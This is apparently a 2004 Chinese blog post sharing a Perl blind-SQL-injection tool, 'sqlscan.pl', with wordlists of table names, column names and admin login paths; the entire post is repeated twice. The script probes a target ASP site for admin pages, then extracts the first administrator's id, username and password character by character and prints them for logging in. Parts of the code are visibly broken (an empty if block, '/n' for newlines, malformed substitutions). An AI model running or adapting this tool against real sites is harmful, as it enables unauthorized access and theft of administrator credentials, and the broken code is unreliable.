sqlscan.pl
Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD
#!/usr/bin/perl
#Codz By 黑嘿黑<cnhacker521@hotmail.com>2004/1/21.
#Thx MIX
$|=1;
use IO::Socket;
print "=======================================================================/n";
print " The sqlform-find Script Codz By 黑嘿黑<QQ:123230273> /n";
print " Our Team : www.cnse8.com /n";
print " My Home : xyhack.91i.net /n";
print "=======================================================================/n";
print "Usage: sql.exe 127.0.0.1 80 /test/wenxue/readarticle.asp?id=3 测试成功 /n";
print "-----------------------------------------------------------------------/n";
if ($#ARGV<1)
if ($#ARGV>1){
$host=$ARGV[0];
$port=$ARGV[1];
$way=$ARGV[2];
$judge=$ARGV[3];}
open(DB, 'sqlfrom.txt') || die "Can't open splfrom.txt.";
@Form = <DB>;
close (DB);
open(L, 'lines.txt') || die "Can't open lines.txt.";
@lines = <L>;
close (L);
open(LG, 'login.txt') || die "Can't open login.txt.";
@login = <LG>;
close (LG);
foreach $log (@login){
chomp $log;
@res=str1();
foreach $check (@res){
($http,$code,$blah) = split(/ /,$check);
if($code == 200){
print "Kaka !! Find the login: http://$host$way1$log/n";
}
}
}
foreach $sqlfrom (@Form){
chomp $sqlfrom;
$line="*";
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/nKaKa !! Find the sqlfrom is /U/a/a$sqlfrom/E: /n";
foreach $line1 (@lines){
chomp $line1;
$line=$line1;
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/a$line1/n";
}
}
}
}
print "/a/a/nInput the SQLForm of admin !/n$SQLForm=";$SQLForm=<STDIN>;chomp $SQLForm;
print "$id=";$ids=<STDIN>;chomp $ids;
print "$Username=";$usernames=<STDIN>;chomp $usernames;
print "$Password=";$passwords=<STDIN>;chomp $passwords;
print "/n/nNow , Start to Crack ! Please wait....../n/n";
#under here is SQL Words
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20$ids=";
$path2 =")";
$id = crackint();
print "/n/nSuccessful,The id of the first admin's id is /a$id ./n/n";
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($passwords)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's password is /a$len ./n/n";
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($passwords,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@password = crackchar();
print "/n/nSuccessful,The admin's password is /a/a@password ./n/n";
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($usernames)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's name is $len ./n/n";
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($usernames,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@username = crackchar();
print "/n/nSuccessful,The admin's username is /a/a@username ./n/n";
print "KaKa !! /a/a/you can use /nusername: @username/npassword: @password/nto login test !/r/n";
sub crackint {
@dic=(1..100);
for ($i=0;$i<@dic;$i++)
{
my $path=$path1.$dic[$i];
my $path=$path.$path2;
$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host: $host/n/n";
print "$dic[$i].";
sleep(1);
@in = sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
return $dic[$i];
last;
}
}
}
sub crackchar {
my $pws;
my @dic11=(0..9);
my @dic12=(a..z);
my @dic13=(A..Z);
my @special=qw(` ~ ! @ # $ %25 ^ %26 * /( /) _ %2b = - { } [ ] : " ; < > ? | , . / /);
my @special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? │ , 。 / 、 〈 〉 ');
my @dic=(@dic11,@dic12,@dic13,@special,@special2);
for ($j=1;$j<=$len;$j++)
{
for ($i=0;$i<@dic;$i++)
{
my $key=$pws.$dic[$i];
my $path=$path1.$j;
my $path=$path.$path2;
my $path=$path.$key;
my $path=$path.$path3;
$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host:$host/n/n";
print "$dic[$i].";
sleep(1);
@in =sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
$th=$j.th;
print "/nSuccessful,The $th word of the char is $dic[$i] /n";
$pws=$pws.$dic[$i];
last;
}
}
}
$pws=~s//%2b//+/ig;
$pws=~s//%25//%/ig;
$pws=~s//%26//&/ig;
return $pws;
}
sub str{
$path="%20and%20exists(select%20".$line."%20from%20$sqlfrom)";
$req = "GET $way$path HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}
sub str1{
@s=split(,$way);
$s=@s;
$ss=@s[$i-1];
$d=length($ss);
$e=length($way);
$way1=substr($way,0,$e-$d);
$req = "GET $way1$log HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}
sub sock{
my ($req) = @_;
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host /n";
print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
sub usage {
print "/nInput the Host Info !/n$Host=";$host=<STDIN>;chomp $host;
print "$Port=";$port=<STDIN>;chomp $port;
print "$Way=";$way=<STDIN>;chomp $way;
print "/Input the Judge Words !/n$Judge=";$judge=<STDIN>;chomp $judge;
}
=================== end =============================
sqlfrom.txt:
admin
user
users
userinfo
admin_userinfo
password
adminuser
manboard
diaryuseruser
pwd
t_user
用户
管理员
lines.txt:
id
userid
username
usr
admin
name
user
userpwd
password
pwd
passwd
psword
pass
pws
pwa
user_id
user_name
user_pass
admin_id
admin_name
admin_pass
admin_password
u_id
u_name
u_password
auid
apwd
姓名
密码
login.txt:
pass.asp
password.asp
psd.asp
username/login.asp
username/admin.asp
denglu.asp
login/admin.asp
login/login.asp
admin_login.asp
login_admin.asp
userlogin.asp
User.Asp
user/login.asp
admin/admin.asp
admin/login.asp
admin.asp
login.htm
admin_login/admin.asp
login_admin/login_admin.asp
login.asp
admpast.asp
admin_login.asp
adminlogin.asp
manageNews/index.htm
Admin/admin_login.asp
admin_index.asp
adminn/index.asp
admin/adminlogin.asp
admin/default.asp
manage/login.asp
Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD
#!/usr/bin/perl
#Codz By 黑嘿黑<cnhacker521@hotmail.com>2004/1/21.
#Thx MIX
$|=1;
use IO::Socket;
print "=======================================================================/n";
print " The sqlform-find Script Codz By 黑嘿黑<QQ:123230273> /n";
print " Our Team : www.cnse8.com /n";
print " My Home : xyhack.91i.net /n";
print "=======================================================================/n";
print "Usage: sql.exe 127.0.0.1 80 /test/wenxue/readarticle.asp?id=3 测试成功 /n";
print "-----------------------------------------------------------------------/n";
if ($#ARGV<1)
if ($#ARGV>1){
$host=$ARGV[0];
$port=$ARGV[1];
$way=$ARGV[2];
$judge=$ARGV[3];}
open(DB, 'sqlfrom.txt') || die "Can't open splfrom.txt.";
@Form = <DB>;
close (DB);
open(L, 'lines.txt') || die "Can't open lines.txt.";
@lines = <L>;
close (L);
open(LG, 'login.txt') || die "Can't open login.txt.";
@login = <LG>;
close (LG);
foreach $log (@login){
chomp $log;
@res=str1();
foreach $check (@res){
($http,$code,$blah) = split(/ /,$check);
if($code == 200){
print "Kaka !! Find the login: http://$host$way1$log/n";
}
}
}
foreach $sqlfrom (@Form){
chomp $sqlfrom;
$line="*";
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/nKaKa !! Find the sqlfrom is /U/a/a$sqlfrom/E: /n";
foreach $line1 (@lines){
chomp $line1;
$line=$line1;
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/a$line1/n";
}
}
}
}
print "/a/a/nInput the SQLForm of admin !/n$SQLForm=";$SQLForm=<STDIN>;chomp $SQLForm;
print "$id=";$ids=<STDIN>;chomp $ids;
print "$Username=";$usernames=<STDIN>;chomp $usernames;
print "$Password=";$passwords=<STDIN>;chomp $passwords;
print "/n/nNow , Start to Crack ! Please wait....../n/n";
#under here is SQL Words
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20$ids=";
$path2 =")";
$id = crackint();
print "/n/nSuccessful,The id of the first admin's id is /a$id ./n/n";
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($passwords)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's password is /a$len ./n/n";
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($passwords,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@password = crackchar();
print "/n/nSuccessful,The admin's password is /a/a@password ./n/n";
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($usernames)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's name is $len ./n/n";
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($usernames,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@username = crackchar();
print "/n/nSuccessful,The admin's username is /a/a@username ./n/n";
print "KaKa !! /a/a/you can use /nusername: @username/npassword: @password/nto login test !/r/n";
sub crackint {
@dic=(1..100);
for ($i=0;$i<@dic;$i++)
{
my $path=$path1.$dic[$i];
my $path=$path.$path2;
$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host: $host/n/n";
print "$dic[$i].";
sleep(1);
@in = sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
return $dic[$i];
last;
}
}
}
sub crackchar {
my $pws;
my @dic11=(0..9);
my @dic12=(a..z);
my @dic13=(A..Z);
my @special=qw(` ~ ! @ # $ %25 ^ %26 * /( /) _ %2b = - { } [ ] : " ; < > ? | , . / /);
my @special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? │ , 。 / 、 〈 〉 ');
my @dic=(@dic11,@dic12,@dic13,@special,@special2);
for ($j=1;$j<=$len;$j++)
{
for ($i=0;$i<@dic;$i++)
{
my $key=$pws.$dic[$i];
my $path=$path1.$j;
my $path=$path.$path2;
my $path=$path.$key;
my $path=$path.$path3;
$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host:$host/n/n";
print "$dic[$i].";
sleep(1);
@in =sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
$th=$j.th;
print "/nSuccessful,The $th word of the char is $dic[$i] /n";
$pws=$pws.$dic[$i];
last;
}
}
}
$pws=~s//%2b//+/ig;
$pws=~s//%25//%/ig;
$pws=~s//%26//&/ig;
return $pws;
}
sub str{
$path="%20and%20exists(select%20".$line."%20from%20$sqlfrom)";
$req = "GET $way$path HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}
sub str1{
@s=split(,$way);
$s=@s;
$ss=@s[$i-1];
$d=length($ss);
$e=length($way);
$way1=substr($way,0,$e-$d);
$req = "GET $way1$log HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}
sub sock{
my ($req) = @_;
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host /n";
print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
sub usage {
print "/nInput the Host Info !/n$Host=";$host=<STDIN>;chomp $host;
print "$Port=";$port=<STDIN>;chomp $port;
print "$Way=";$way=<STDIN>;chomp $way;
print "/Input the Judge Words !/n$Judge=";$judge=<STDIN>;chomp $judge;
}
=================== end =============================
sqlfrom.txt:
admin
user
users
userinfo
admin_userinfo
password
adminuser
manboard
diaryuseruser
pwd
t_user
用户
管理员
lines.txt:
id
userid
username
usr
admin
name
user
userpwd
password
pwd
passwd
psword
pass
pws
pwa
user_id
user_name
user_pass
admin_id
admin_name
admin_pass
admin_password
u_id
u_name
u_password
auid
apwd
姓名
密码
login.txt:
pass.asp
password.asp
psd.asp
username/login.asp
username/admin.asp
denglu.asp
login/admin.asp
login/login.asp
admin_login.asp
login_admin.asp
userlogin.asp
User.Asp
user/login.asp
admin/admin.asp
admin/login.asp
admin.asp
login.htm
admin_login/admin.asp
login_admin/login_admin.asp
login.asp
admpast.asp
admin_login.asp
adminlogin.asp
manageNews/index.htm
Admin/admin_login.asp
admin_index.asp
adminn/index.asp
admin/adminlogin.asp
admin/default.asp
manage/login.asp
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
